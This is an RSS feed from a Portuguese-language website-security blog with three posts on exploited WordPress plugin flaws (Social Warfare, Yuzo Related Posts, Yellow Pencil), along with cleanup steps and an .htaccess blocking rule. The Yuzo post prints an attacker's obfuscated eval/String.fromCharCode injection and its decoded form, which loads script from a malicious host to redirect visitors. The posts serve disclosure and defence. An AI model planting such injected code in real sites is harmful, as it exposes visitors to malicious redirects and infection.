<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Arquivos plugin - ETH SECURITY</title>
	<atom:link href="https://ethsecurity.com.br/tag/plugin/feed/" rel="self" type="application/rss+xml" />
	<link>https://ethsecurity.com.br/tag/plugin/</link>
	<description>Especialista em segurança de sites</description>
	<lastBuildDate>Tue, 20 Sep 2022 17:37:19 +0000</lastBuildDate>
	<language>pt-BR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.3</generator>

<image>
	<url>https://ethsecurity.com.br/wp-content/uploads/2019/04/logo-150x150.jpg</url>
	<title>Arquivos plugin - ETH SECURITY</title>
	<link>https://ethsecurity.com.br/tag/plugin/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">161029545</site>	<item>
		<title>Vulnerabilidades sendo exploradas no plugin Social Warfare</title>
		<link>https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/</link>
					<comments>https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Thu, 25 Apr 2019 03:49:16 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[vulnerabildiade de plugins]]></category>
		<category><![CDATA[vulnerabildiade wordpress]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=236</guid>

					<description><![CDATA[<p>Nos últimos dias vários sites WordPress que possuem o plugin Social Warfare estão sendo atacados devido uma vulnerabilidade de RCE (Remote code Execution ou Execução Remota de Código) presente na programação do plugin, a estimativa é de que são mais de 40.000 sites no mundo com essa falha. O problema está no arquivo social-warfare\lib\utilities\SWP_ Databa [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/">Vulnerabilidades sendo exploradas no plugin Social Warfare</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Nos últimos dias vários sites WordPress que possuem o plugin Social Warfare estão sendo atacados devido uma vulnerabilidade de RCE (Remote code Execution ou Execução Remota de Código) presente na programação do plugin, a estimativa é de que são mais de 40.000 sites no mundo com essa falha.</p>
<p>O problema está no arquivo social-warfare\lib\utilities\SWP_ Databa se_Migration.php, dentro desse arquivo existe uma varável com o nome $_GET[‘swp_url’] com a função get_file_content do php, que permite a execução de códigos remotamente:</p>
<p><img fetchpriority="high" decoding="async" class="alignnone wp-image-107 size-full" src="https://ethsecurity.com.br/wp-content/uploads/2019/04/Plugin-Vulnerability-574x270.jpg" alt="" width="574" height="270" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/Plugin-Vulnerability-574x270.jpg 574w, https://ethsecurity.com.br/wp-content/uploads/2019/04/Plugin-Vulnerability-574x270-300x141.jpg 300w" sizes="(max-width: 574px) 100vw, 574px" /></p>
<p>A grande falha aqui está na função is_admin() do wordpress que é utilizada incorretamente, que faz somente a checagem se a url solicitada faz parte da página de admin, não fazendo a validação se o administrador está logado.</p>
<h3>Fazendo o teste:</h3>
<p>Novamente usei o laboratório local para teste, colocando o exploit e payload em outra maquina para comprovar o acesso não autorizado, como o código permite execução de comandos dentro de arquivos, criei um arquivo txt com a função phpinfo(), segue o resultado:</p>
<p>&nbsp;</p>
<p>E se eu quiser o nome da base de dados e outras infromações importantes, basta o invasor usar a imaginação (isso eles tem de sobra), baixar conteúdo, visualizar a senha da base de dados e até inserir usuários no banco de dados, criando outro admin para o site.</p>
<h3>Não acaba por ai, temos uma vulnerabilidade de XSS de brinde:</h3>
<p>Além da falha citada acima, essa brecha abre caminho para inserir conteúdo no banco de dados com técnicas de Cross Site Scripting, assim como mostrei no <a href="https://www.ethsecurity.com.br/2019/04/19/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/">post do Yuzo Related Posts</a></p>
<p>Com a mesma url é utilizado um outro exploit e dessa vez podemos inserir conteúdo no banco de dados e redirecionar o site para domínios maliciosos, não vamos detalhar a vulnerabilidade pois seria um copiar e colar do post relacionado ao related posts.</p>
<h3>Solução:</h3>
<p>Atualize o plugin o mais rápido possível para a versão acima de 3.5.3 .</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/">Vulnerabilidades sendo exploradas no plugin Social Warfare</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">236</post-id>	</item>
		<item>
		<title>[Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção</title>
		<link>https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/</link>
					<comments>https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/#comments</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Fri, 19 Apr 2019 12:06:24 +0000</pubDate>
				<category><![CDATA[remoção de malware]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[remoção de malwares]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=138</guid>

					<description><![CDATA[<p>Recentemente vários ataques estão sendo direcionados para o plugin Yuzo Related Posts, utilizado por cerca de 60.000 sites WordPress. A vulnerabilidade se assemelha ao Social Warfare e ao Yellow Pencil, as rotinas do plugin que fazem com que o mesmo salve configurações na base de dados carecem de uma autenticação de segurança, o que faz [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/">[Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Recentemente vários ataques estão sendo direcionados para o plugin Yuzo Related Posts, utilizado por cerca de 60.000 sites WordPress. A vulnerabilidade se assemelha ao Social Warfare e ao Yellow Pencil, as rotinas do plugin que fazem com que o mesmo salve configurações na base de dados carecem de uma autenticação de segurança, o que faz que a falha seja explorada.</p>
<p><iframe width="1200" height="675" src="https://www.youtube.com/embed/0iJeesXerGs?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p>
<h3>Infecção:</h3>
<p>Uma vez explorada o invasor insere um código malicioso como da imagem abaixo:</p>
<p><strong><code class="plain">&lt;script language=javascript&gt;</code></strong><strong><code class="functions">eval</code></strong><strong><code class="plain">(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));&lt;/script&gt;</code></strong></p>
<p>O código descriptografado fica dessa maneira:</p>
<p><strong>&lt;/style&gt;&lt;script language=javascript&gt;var elem = document.createElement(&#8216;script&#8217;);</strong></p>
<p><strong>elem.type = &#8216;text/javascript&#8217;;</strong></p>
<p><strong>elem.async = true; elem.src = &#8216;hxxps://hellofromhony[.]org/counter&#8217;;</strong></p>
<p><strong>document.getElementsByTagName(&#8216;head&#8217;)[0].appendChild(elem);&lt;/script&gt;</strong></p>
<p>Assim quando o site é acessado o usuário e redirecionado para sites maliciosos.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<h3>Removendo a infecção:</h3>
<p>Primeiramente faça um backup de sua base de dados, pois caso dê algo errado você terá uma cópia de segurança.</p>
<p>Acesse seu PhpMyAdmin ou o gerenciador de banco de dados de sua preferência e clique na base de dados e em pesquisar, adicione a string &#8220;String.fromCharCode(118&#8221; ,sem aspas, no campo de pesquisa e clique em selecionar todas as tabelas e cliquem em executar no canto a direita:</p>
<p><img decoding="async" class="size-medium wp-image-161 aligncenter" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/how-to-300x240.png" alt="" width="300" height="240" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to-300x240.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to.png 631w" sizes="(max-width: 300px) 100vw, 300px" /></p>
<p>Após isso você verá que o conteúdo foi encontrado na tabela wp_options:</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-162" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/how-to-2-300x240.png" alt="" width="328" height="262" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to-2-300x240.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to-2.png 631w" sizes="auto, (max-width: 328px) 100vw, 328px" /></p>
<p>Copie todo o conteúdo para um bloco de notas e remova exatamente o conteúdo que foi citado acima e substitua na tabela citada pelo conteúdo sem a infecção.</p>
<p>&nbsp;</p>
<h3>Contra medida:</h3>
<p>&nbsp;</p>
<h3><img loading="lazy" decoding="async" class="alignnone size-medium wp-image-90" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-300x225.png" alt="" width="300" height="225" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-300x225.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-768x576.png 768w, https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-700x525.png 700w, https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234.png 770w" sizes="auto, (max-width: 300px) 100vw, 300px" /></h3>
<p>Ainda não foi publicada uma atualização para o problema, então a recomendação é de que o plugin seja totalmente removido de sua instalação até que o desenvolvedor publique uma correção:</p>
<p>https://wordpress.org/support/topic/remove-this-plugin-immediately/</p>
<p>Como dito no vídeo criei um htaccess para que você possa se proteger dessa falha caso deseje manter o plugin, porém essa medida serve somente para esse tipo de ataque, pois o invasor pode alterar o modo como realiza a requisição, porém já é o bastante para bloquear o processo automático que ocorre nesse momento na internet:</p>
<p>&nbsp;</p>
<p>RewriteEngine on<br />
ErrorDocument 406 &#8220;&lt;head&gt;&lt;title&gt;Bad Request!&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Blocked by Defensor Web!&lt;/h1&gt;&lt;p&gt;Hacking Attempt!. &lt;/p&gt;&lt;/body&gt;&lt;/html&gt;&#8221;<br />
RewriteEngine On<br />
RewriteCond %{THE_REQUEST} &#8220;POST \/wp-admin\/admin-post\.php\?page\=yuzo-related-post HTTP\/1.1&#8221; [NC]<br />
RewriteRule .* – [R=406,L]</p>
<p>&nbsp;</p>
<p>As aspas podem colar incorretamente em seu htaccess, então disponibilizei o código raw no pastebin:</p>
<p><a href="https://pastebin.com/GKYBv5Qt">https://pastebin.com/GKYBv5Qt</a></p>
<p>&nbsp;</p>
<p>Dúvidas e sugestões fiquem a vontade para se expressarem nos comentários.</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<p>O post <a href="https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/">[Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">138</post-id>	</item>
		<item>
		<title>Vulnerabilidade sendo explorada no plugin Yellow Pencil do WordPress, atualização já disponível.</title>
		<link>https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-yellow-pencil-do-wordpress/</link>
					<comments>https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-yellow-pencil-do-wordpress/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Sat, 13 Apr 2019 15:02:39 +0000</pubDate>
				<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[vulnerabilidade yellow pencil]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=106</guid>

					<description><![CDATA[<p>    Foi publicada essa semana uma vulnerabilidade que vem sendo explorada por hackers a fim de infectar sites WordPress que utilizam o plugin Yellow Pencil. Esse plugin é muito utilizado para personalizar o estilo do sites, como cores e formatos das páginas, porém o mesmo foi removido do repositório do WordPress  devido a falha [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-yellow-pencil-do-wordpress/">Vulnerabilidade sendo explorada no plugin Yellow Pencil do WordPress, atualização já disponível.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<blockquote>
<p style="text-align: left;">    Foi publicada essa semana uma vulnerabilidade que vem sendo explorada por hackers a fim de infectar sites WordPress que utilizam o plugin Yellow Pencil. Esse plugin é muito utilizado para personalizar o estilo do sites, como cores e formatos das páginas, porém o mesmo foi removido do repositório do WordPress  devido a falha descoberta.</p>
</blockquote>
<p>&nbsp;</p>
<h3>    Escalonamento de privilégio que permite a alteração na tabela wp_options:</h3>
<p>A primeira parte da falha está presente no arquivo yellow-pencil.php, que possui um função que é chamada a cada carregamento de página para verificar se o parâmetro yp_remote_get foi definido, em caso afirmativo o plugin eleva o privilégio para de  um administrador do WordPress  para concluir a solicitação.</p>
<p>&nbsp;</p>
<h3>    Como essa falha vem sendo explorada:</h3>
<p>Como a falha concede acesso para que o conteúdo da tabela wp_options seja alterado, informações sensíveis a segurança estão sendo alteradas, como email do administrador e a URL do site, assim quando o site é acessado o usuário é redirecionado para sites malicioso que tem como objetivo infectar os computadores dos usuários, trazendo assim sérios prejuízos  para a imagem do site na internet e no ranqueamento do Google, o que é um transtorno e tanto para quem deseja ter uma presença online de sucesso.</p>
<p>&nbsp;</p>
<h3>O que fazer caso seu site utilize este plugin:</h3>
<p>Caso você utilize esse plugin há grandes chances de sei site estar infectado, em caso afirmativo você pode utilizar o sitecheck do portal Sucuri para detectar a url maliciosa, porém recomendamos que esse plugin seja removido de sua instalação até que uma atualização de segurança seja disponibilizada.</p>
<p>Caso mesmo assim você precise utilizar esse plugin em seu site e não posso substituí-lo ou removê-lo recomendamos que utilize o firewall do <a href="https://www.wordfence.com/">Wordfence</a> na versão premium, que já possui uma proteção para essa exploração.</p>
<p>&nbsp;</p>
<h3> Update!</h3>
<p>O plugin Yellow Pencil publicou na data de hoje uma atualização para a falha relatada neste post, fizemos os devidos testes com a nova versão conforme o link para atualização:</p>
<p>https://yellowpencil.waspthemes.com/docs/important-security-update/</p>
<p>Com base nos testes a falha foi devidamente fechada, então caso você possua esse plugin em seu WordPress realize o update imediatamente.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<p>&nbsp;</p>
<p>E aí? o que acharam? fiquem a vontade para se expressar nos comentários, também podem realizar perguntas que nossa equipe terá prazer em respondê-las.</p>
<p>&nbsp;</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-yellow-pencil-do-wordpress/">Vulnerabilidade sendo explorada no plugin Yellow Pencil do WordPress, atualização já disponível.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-yellow-pencil-do-wordpress/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">106</post-id>	</item>
	</channel>
</rss>
